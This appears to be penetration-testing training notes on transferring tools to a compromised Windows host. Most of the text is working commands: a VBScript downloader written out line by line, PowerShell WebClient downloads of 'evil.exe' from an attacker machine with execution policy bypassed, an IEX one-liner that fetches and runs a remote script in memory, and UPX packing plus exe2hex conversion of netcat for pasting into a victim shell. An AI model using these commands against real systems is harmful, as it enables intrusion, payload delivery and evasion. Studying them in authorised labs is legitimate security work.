Windows Downloads Using Scripting Languages
Creating a VBScript HTTP downloader script
Copy echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
We can run this (with cscript) to download files from our Kali machine:
Copy C:\Users\Offsec > cscript wget.vbs http://10.11.0.4/evil.exe evil.exe
Windows Downloads using PowerShell
The example below shows an implementation of a downloader script using the System.Net.WebClient PowerShell class:
Copy C:\Users\Offsec > echo $webclient = New-Object System.Net.WebClient >> wget.ps1
C:\Users\Offsec > echo $url = "http://10.11.0.4/evil.exe" >> wget.ps1
C:\Users\Offsec > echo $file = "new-exploit.exe" >> wget.ps1
C:\Users\Offsec > echo $webclient .DownloadFile ($url,$file) >> wget.ps1
we can run it using this:
Copy C:\Users\Offsec > powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
We can also execute this script as a one-liner as shown below:
Copy C:\Users\Offsec > powershell.exe (New-Object System.Net.WebClient ).DownloadFile( 'http://10.11.0.4/evil.exe' , 'new-exploit.exe' )
Windows Download and Execution from hosted remote file
To demonstrate this, we will create a simple PowerShell script on our Kali machine (Listing 20):
Copy kali@kali:/var/www/html$ sudo cat helloworld.ps1
Write-Output "Hello World"
Next, we will run the script with the following command on our compromised Windows machine:
Copy C:\Users\Offsec > powershell.exe IEX (New-Object System.Net.WebClient ).DownloadString( 'http://10.11.0.4/helloworld.ps1' )
Hello World
The content of the PowerShell script was downloaded from our Kali machine and successfully executed without saving it to the victim hard disk.
Windows Downloads with exe2hex and PowerShell
We'll start by locating and inspecting the nc.exe file on Kali Linux.
Copy kali@kali:~$ locate nc.exe | grep binaries
/usr/share/windows-resources/binaries/nc.exe
kali@kali:~$ cp /usr/share/windows-resources/binaries/nc.exe .
kali@kali:~$ ls -lh nc.exe
-rwxr-xr-x 1 kali kali 58K Sep 18 14:22 nc.exe
Although the binary is already quite small, we will reduce the file size to show how it's done. We will use upx, an executable packer (also known as a PE compression tool):
Copy kali@kali:~$ upx -9 nc.exe
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2018
UPX 3.95 Markus Oberhumer, Laszlo Molnar & John Reiser Aug 26th 2018
File size Ratio Format Name
-------------------- ------ ----------- -----------
59392 - > 29696 50.00% win32/pe nc.exe
Packed 1 file.
kali@kali:~$ ls -lh nc.exe
-rwxr-xr-x 1 kali kali 29K Sep 18 14:22 nc.exe
We'll use the excellent exe2hex tool for the conversion process:
Copy kali@kali:~$ exe2hex -x nc.exe -p nc.cmd
[ * ] exe2hex v1.5.1
[+] Successfully wrote ( PoSh ) nc.cmd
When we copy and paste this script into a shell on our Windows machine and run it, we can see that it does.